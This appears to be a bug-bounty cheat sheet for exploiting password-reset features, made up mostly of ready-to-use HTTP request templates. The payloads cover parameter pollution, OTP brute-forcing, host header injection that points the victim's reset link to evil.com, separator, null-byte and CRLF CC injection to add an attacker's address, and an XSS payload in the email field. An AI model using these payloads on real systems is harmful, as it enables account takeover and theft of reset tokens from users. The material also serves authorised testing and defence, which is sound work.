Forgot Password
Introduction
Some common bugs in the forgot password / reset password functionality
How to exploit
Parameter pollution
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&email=hacker@mail.com
Bruteforce the OTP code
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com&code=$123456$
Host header Injection
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com
to
POST /reset HTTP/1.1
Host: target.com
X-Forwarded-Host: evil.com
...
email=victim@mail.com
And the victim will receive the reset link with evil.com
Using separator in value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com,hacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%20hacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com|hacker@mail.com
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%00hacker@mail.com
No domain in value of the paramter
POST /reset HTTP/1.1
Host: target.com
...
email=victim
No TLD in value of the parameter
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail
Using carbon copy
POST /reset HTTP/1.1
Host: target.com
...
email=victim@mail.com%0a%0dcc:hacker@mail.com
If there is JSON data in body requests, add comma
POST /newaccount HTTP/1.1
Host: target.com
...
{"email":"victim@mail.com","hacker@mail.com","token":"xxxxxxxxxx"}
Find out how the tokens generate
Generated based on TimeStamp
Generated based on the ID of the user
Generated based on the email of the user
Generated based on the name of the user
Try Cross-Site Scripting (XSS) in the form
Sometimes the email is reflected in the forgot password page, try to use XSS payload
"<svg/onload=alert(1)>"@gmail.com
Last updated